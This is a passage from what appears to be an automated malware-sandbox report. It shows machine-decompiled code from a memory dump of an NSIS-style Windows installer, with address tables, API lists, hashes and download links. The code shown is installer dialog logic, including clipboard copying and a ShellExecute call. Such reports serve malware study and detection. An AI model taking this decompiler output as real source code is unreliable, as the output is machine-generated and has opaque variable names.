											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x423fa0 = _a4;
					_t247 =  *0x423f6c; // 0x3
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42052c = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x423f40, 0x6e);
					 *0x420520 =  *0x420520 | 0xffffffff;
					_v24 = _t250;
					 *0x420528 = SetWindowLongA(_v8, 0xfffffffc, E00404DD4);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420514 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420514);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BBA(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E54(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E54(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x423f6c - _t318; // 0x3
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42052c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42052c + _t318 * 4) = _t274;
									_t288 =  *( *0x42052c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x423f6c; // 0x3
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E89(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E89(_v12);
								L89:
								return E00403EBB(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                0x004047f1
                0x004047f7
                0x004047f9
                0x004047ff
                0x00404805
                0x00404808
                0x00404812
                0x0040481b
                0x0040481e
                0x00404821
                0x00404a49
                0x00404a49
                0x00404a50
                0x00404a64
                0x00404a52
                0x00404a54
                0x00404a57
                0x00404a58
                0x00404a5f
                0x00404a5f
                0x00404a67
                0x00404a70
                0x00404a7b
                0x00404a7b
                0x00404a7e
                0x00404a81
                0x00404a90
                0x00404a90
                0x00404a97
                0x00404b0f
                0x00404b0f
                0x00404b12
                0x00404b14
                0x00404b17
                0x00404b1e
                0x00404b2c
                0x00404b2c
                0x00404b2e
                0x00404b31
                0x00404b38
                0x00404b3a
                0x00404b3e
                0x00404b5b
                0x00404b5f
                0x00404b5f
                0x00404b40
                0x00404b4d
                0x00404b4d
                0x00404b3e
                0x00404b38
                0x00000000
                0x00404b12
                0x00404a99
                0x00404a9c
                0x00404aa7
                0x00404aa9
                0x00404aac
                0x00404ab3
                0x00404ab8
                0x00404aba
                0x00404ac4
                0x00404ac4
                0x00404ac8
                0x00404aca
                0x00404acd
                0x00404acf
                0x00404ad2
                0x00404ae8
                0x00404ae8
                0x00404ad4
                0x00404ad4
                0x00404ada
                0x00404adc
                0x00404ae3
                0x00404ade
                0x00404ade
                0x00404ade
                0x00404adc
                0x00404aec
                0x00404aee
                0x00404af3
                0x00404afc
                0x00404afd
                0x00404b07
                0x00404b07
                0x00404b09
                0x00404b0c
                0x00404b0c
                0x00404acd
                0x00000000
                0x00404aba
                0x00404a9e
                0x00404aa1
                0x00404aa5
                0x00000000
                0x00000000
                0x00000000
                0x00404aa5
                0x00404a83
                0x00404a8a
                0x00000000
                0x00000000
                0x00000000
                0x00404a72
                0x00404a72
                0x00404a75
                0x00404b62
                0x00404b62
                0x00404b69
                0x00404bdd
                0x00404bdd
                0x00404be4
                0x00404bf0
                0x00404bf0
                0x00404bf2
                0x00404bf9
                0x00404bfb
                0x00404c00
                0x00404c02
                0x00404c05
                0x00404c05
                0x00404c0b
                0x00404c10
                0x00404c12
                0x00404c15
                0x00404c15
                0x00404c1b
                0x00404c21
                0x00404c27
                0x00404c27
                0x00404c2d
                0x00404c34
                0x00404d81
                0x00404d81
                0x00404d88
                0x00404d8a
                0x00404d91
                0x00404d95
                0x00404da2
                0x00404da2
                0x00404da5
                0x00404dab
                0x00404dbd
                0x00404dbd
                0x00404d91
                0x00000000
                0x00404c3a
                0x00404c3c
                0x00404c41
                0x00404c44
                0x00404c48
                0x00404c48
                0x00404c4d
                0x00404c50
                0x00404c91
                0x00404c93
                0x00404c9d
                0x00404ca3
                0x00404ca6
                0x00404cab
                0x00404cb2
                0x00404cb5
                0x00404d57
                0x00404d5d
                0x00404d63
                0x00404d68
                0x00404d6b
                0x00404d7c
                0x00404d7c
                0x00000000
                0x00404cbb
                0x00404cbb
                0x00404cbb
                0x00404cbe
                0x00404cc4
                0x00404cc7
                0x00404cc9
                0x00404ccb
                0x00404ccd
                0x00404cd0
                0x00404cd3
                0x00404cda
                0x00404cdc
                0x00404cdf
                0x00404ce6
                0x00404ce9
                0x00404ce9
                0x00404ce9
                0x00404ce9
                0x00404ced
                0x00404cf0
                0x00404cfc
                0x00404cfd
                0x00404d00
                0x00404d02
                0x00404d02
                0x00404d02
                0x00404cf2
                0x00404cf4
                0x00404cf4
                0x00404d21
                0x00404d21
                0x00404d22
                0x00404d2e
                0x00404d3d
                0x00404d3d
                0x00404d3f
                0x00404d42
                0x00404d4b
                0x00404d4b
                0x00000000
                0x00404cbe
                0x00404c52
                0x00404c5d
                0x00404c60
                0x00404c65
                0x00404c67
                0x00404c69
                0x00404c6b
                0x00404c7b
                0x00404c85
                0x00404c87
                0x00404c8a
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00404c6d
                0x00404c6d
                0x00404c6d
                0x00404c70
                0x00404c73
                0x00404c75
                0x00404c75
                0x00404c75
                0x00404c76
                0x00404c77
                0x00404c77
                0x00000000
                0x00404c6d
                0x00404c50
                0x00404c34
                0x00404b6b
                0x00404b71
                0x00000000
                0x00000000
                0x00404b7d
                0x00404b81
                0x00000000
                0x00000000
                0x00404b91
                0x00404b93
                0x00404b96
                0x00000000
                0x00000000
                0x00404ba8
                0x00404baa
                0x00404bad
                0x00404bb7
                0x00404bb9
                0x00404bba
                0x00404bbb
                0x00404bca
                0x00404bcc
                0x00404bd3
                0x00404bd6
                0x00000000
                0x00404bd6
                0x00404baf
                0x00404bb2
                0x00404bb5
                0x00000000
                0x00000000
                0x00000000
                0x00404bb5
                0x00000000
                0x00404a75
                0x00404827
                0x0040482c
                0x00404831
                0x00404836
                0x00404837
                0x00404840
                0x0040484b
                0x00404856
                0x0040485c
                0x0040486a
                0x0040487f
                0x00404884
                0x0040488f
                0x00404898
                0x004048ad
                0x004048be
                0x004048cb
                0x004048cb
                0x004048d0
                0x004048d6
                0x004048d8
                0x004048db
                0x004048e0
                0x004048e5
                0x004048e7
                0x004048e7
                0x00404907
                0x00404907
                0x00404909
                0x0040490a
                0x0040490f
                0x00404912
                0x00404915
                0x00404919
                0x0040491e
                0x00404923
                0x00404927
                0x0040492c
                0x00404931
                0x00404933
                0x00404935
                0x0040493b
                0x00404a05
                0x00404a18
                0x00000000
                0x00404941
                0x00404944
                0x00404947
                0x0040494a
                0x0040494a
                0x00404950
                0x00404956
                0x00404959
                0x0040495f
                0x00404960
                0x00404965
                0x0040496e
                0x00404975
                0x00404978
                0x0040497b
                0x0040497e
                0x004049b8
                0x004049ba
                0x004049e3
                0x004049bc
                0x004049c9
                0x004049c9
                0x00404980
                0x00404983
                0x00404992
                0x0040499c
                0x004049a4
                0x004049ab
                0x004049b3
                0x004049b3
                0x0040497e
                0x004049e9
                0x004049ea
                0x004049f0
                0x004049f6
                0x004049f6
                0x00404a03
                0x00404a1e
                0x00404a22
                0x00404a3f
                0x00404a44
                0x00404a47
                0x00404a47
                0x00000000
                0x00404a24
                0x00404a29
                0x00404a32
                0x00404dbf
                0x00404dd1
                0x00404dd1
                0x00404a22
                0x00000000
                0x00404a03
                0x0040493b

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                • String ID: $M$N$[EY
                • API String ID: 1638840714-2548491320
                • Opcode ID: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                • Instruction ID: 9a6d62add78faf2b4aa272e1cf177665df16ecedb9a61d3aa4425c18576eb247
                • Opcode Fuzzy Hash: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                • Instruction Fuzzy Hash: 8B029DB0E00209AFDB24DF55DD45AAE7BB5EB84315F10817AF610BA2E1C7789A81CF58
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404FC2, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                Download Yara Rule
                C-Code - Quality: 96%
                			E00404FC2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423724; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F56, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405BBA(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x420538;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42370c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x423f48, 8);
							__eflags =  *0x423fcc - _t149; // 0x0
							if(__eflags == 0) {
								E00404E84( *((intOrPtr*)( *0x41fd08 + 0x34)), _t149);
							}
							E00403E2D(1);
							goto L25;
						}
						 *0x41f900 = 2;
						E00403E2D(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403EBB(_a8, _a12, _a16);
						}
						ShowWindow( *0x423710, _t149);
						ShowWindow(_t154, 8);
						E00403E89(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423f50; // 0x58d7c8
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423710 = GetDlgItem(_a4, 0x403);
				 *0x423708 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423724 = _t127;
				_v8 = _t127;
				E00403E89( *0x423710);
				 *0x423714 = E00404726(4);
				 *0x42372c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E54(_a4);
				if(( *0x423f58 & 0x00000003) != 0) {
					ShowWindow( *0x423710, _t149);
					if(( *0x423f58 & 0x00000002) != 0) {
						 *0x423710 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E89( *0x423708);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423f58 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}


































                0x00404fcb
                0x00404fd1
                0x00404fda
                0x00404fdd
                0x0040516e
                0x00405175
                0x00405199
                0x00405199
                0x0040519f
                0x004051ac
                0x004051ca
                0x004051ca
                0x004051d1
                0x00405228
                0x00405228
                0x0040522c
                0x00000000
                0x00000000
                0x0040522e
                0x00405231
                0x00000000
                0x00000000
                0x0040523b
                0x00405241
                0x00405243
                0x00405246
                0x0040533f
                0x00000000
                0x0040533f
                0x00405255
                0x00405261
                0x00405267
                0x0040526a
                0x0040526d
                0x00405282
                0x00405285
                0x00405285
                0x00405288
                0x0040526f
                0x00405274
                0x0040527a
                0x0040527d
                0x0040527d
                0x00405298
                0x004052a0
                0x004052a1
                0x004052a3
                0x004052ac
                0x004052af
                0x004052b6
                0x004052bd
                0x004052c5
                0x004052c5
                0x004052d3
                0x004052d9
                0x004052dc
                0x004052dc
                0x004052e3
                0x004052e9
                0x004052f2
                0x004052f9
                0x00405302
                0x00405304
                0x00405307
                0x00405316
                0x00405318
                0x0040531e
                0x0040531f
                0x00405320
                0x00405320
                0x00405328
                0x00405333
                0x00405339
                0x00405339
                0x00000000
                0x004052a3
                0x004051d3
                0x004051d9
                0x00405209
                0x0040520b
                0x00405211
                0x0040521c
                0x0040521c
                0x00405223
                0x00000000
                0x00405223
                0x004051dd
                0x004051e7
                0x00000000
                0x004051ae
                0x004051ae
                0x004051b4
                0x004051ec
                0x00000000
                0x004051f5
                0x004051bd
                0x004051c2
                0x004051c5
                0x00000000
                0x004051c5
                0x004051ac
                0x00404fe3
                0x00404fe7
                0x00404ff0
                0x00404ff7
                0x00404ffa
                0x00404ffd
                0x00405000
                0x00405001
                0x00405002
                0x0040501b
                0x0040501e
                0x00405028
                0x00405037
                0x0040503f
                0x00405047
                0x0040504c
                0x0040504f
                0x0040505b
                0x00405064
                0x0040506d
                0x00405090
                0x00405096
                0x004050a7
                0x004050ac
                0x004050ba
                0x004050c8
                0x004050c8
                0x004050cd
                0x004050db
                0x004050db
                0x004050e0
                0x004050e3
                0x004050e8
                0x004050f4
                0x004050fd
                0x0040510a
                0x00405119
                0x0040510c
                0x00405111
                0x00405111
                0x00405125
                0x00405125
                0x00405139
                0x00405142
                0x0040514b
                0x0040515b
                0x00405167
                0x00405167
                0x00000000

                APIs
                • GetDlgItem.USER32 ref: 00405021
                • GetDlgItem.USER32 ref: 00405030
                • GetClientRect.USER32 ref: 0040506D
                • GetSystemMetrics.USER32 ref: 00405075
                • SendMessageA.USER32 ref: 00405096
                • SendMessageA.USER32 ref: 004050A7
                • SendMessageA.USER32 ref: 004050BA
                • SendMessageA.USER32 ref: 004050C8
                • SendMessageA.USER32 ref: 004050DB
                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004050FD
                • ShowWindow.USER32(?,00000008), ref: 00405111
                • GetDlgItem.USER32 ref: 00405132
                • SendMessageA.USER32 ref: 00405142
                • SendMessageA.USER32 ref: 0040515B
                • SendMessageA.USER32 ref: 00405167
                • GetDlgItem.USER32 ref: 0040503F
                  • Part of subcall function 00403E89: SendMessageA.USER32 ref: 00403E97
                • GetDlgItem.USER32 ref: 00405184
                • CreateThread.KERNEL32 ref: 00405192
                • CloseHandle.KERNEL32(00000000), ref: 00405199
                • ShowWindow.USER32(00000000), ref: 004051BD
                • ShowWindow.USER32(00000000,00000008), ref: 004051C2
                • ShowWindow.USER32(00000008), ref: 00405209
                • SendMessageA.USER32 ref: 0040523B
                • CreatePopupMenu.USER32 ref: 0040524C
                • AppendMenuA.USER32 ref: 00405261
                • GetWindowRect.USER32 ref: 00405274
                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405298
                • SendMessageA.USER32 ref: 004052D3
                • OpenClipboard.USER32 ref: 004052E3
                • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004052E9
                • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F2
                • GlobalLock.KERNEL32 ref: 004052FC
                • SendMessageA.USER32 ref: 00405310
                • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405328
                • SetClipboardData.USER32 ref: 00405333
                • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 00405339
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                • String ID: {
                • API String ID: 590372296-366298937
                • Opcode ID: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                • Instruction ID: 6929f331228a41c4e1f6bf5049925f100d3ed94cd800429e98060a15954be78d
                • Opcode Fuzzy Hash: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                • Instruction Fuzzy Hash: 6DA13AB1900208BFDB119F60DD89AAE7F79FB44355F00813AFA05BA1A0C7795E41DFA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403F9C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 204windowstringCOMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E00403F9C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420518 =  *0x420518 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403EBB(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422ee0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422ee0
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423f48, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423f48, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420518 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fd08 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E76(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404227();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42371c; // 0x59455b
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x423f78; // 0x5929fc
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F68;
				E00403E54(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E54(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E76( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E89(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x423f50; // 0x58d7c8
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f4fc =  *0x41f4fc & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420518 =  *0x420518 & 0x00000000;
				return 0;
			}




















                0x00403fac
                0x004040d2
                0x0040412e
                0x00404132
                0x00404209
                0x0040420b
                0x0040420b
                0x00404211
                0x00404211
                0x00404214
                0x00000000
                0x0040421b
                0x00404140
                0x00404142
                0x0040414c
                0x00404157
                0x0040415a
                0x0040415d
                0x00404168
                0x0040416b
                0x00404172
                0x00404180
                0x00404198
                0x004041a0
                0x004041ab
                0x004041bb
                0x004041bd
                0x004041bd
                0x00404172
                0x004041c7
                0x00000000
                0x004041d2
                0x004041d6
                0x004041e7
                0x004041e7
                0x004041ed
                0x004041fb
                0x004041fb
                0x00000000
                0x004041ff
                0x004041c7
                0x004040dd
                0x00000000
                0x004040f1
                0x004040f7
                0x004040fd
                0x00000000
                0x00000000
                0x00404122
                0x00404124
                0x00404129
                0x00000000
                0x00404129
                0x004040dd
                0x00403fb2
                0x00403fb5
                0x00403fba
                0x00403fbc
                0x00403fcb
                0x00403fcb
                0x00403fcd
                0x00403fd2
                0x00403fd5
                0x00403fd7
                0x00403fdc
                0x00403fe5
                0x00403feb
                0x00403ff7
                0x00403ffa
                0x00404003
                0x00404008
                0x0040400b
                0x00404010
                0x00404027
                0x0040402e
                0x00404041
                0x00404044
                0x00404059
                0x0040405b
                0x00404060
                0x00404065
                0x0040406a
                0x0040406a
                0x00404079
                0x00404088
                0x0040408a
                0x004040a0
                0x004040af
                0x004040b1
                0x00000000

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                • String ID: N$[EY$open$.B
                • API String ID: 3615053054-30299783
                • Opcode ID: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                • Instruction ID: d52f05746bbb3f3b1d606d9c91532631e65720296560e4ea5c31ec00add49965
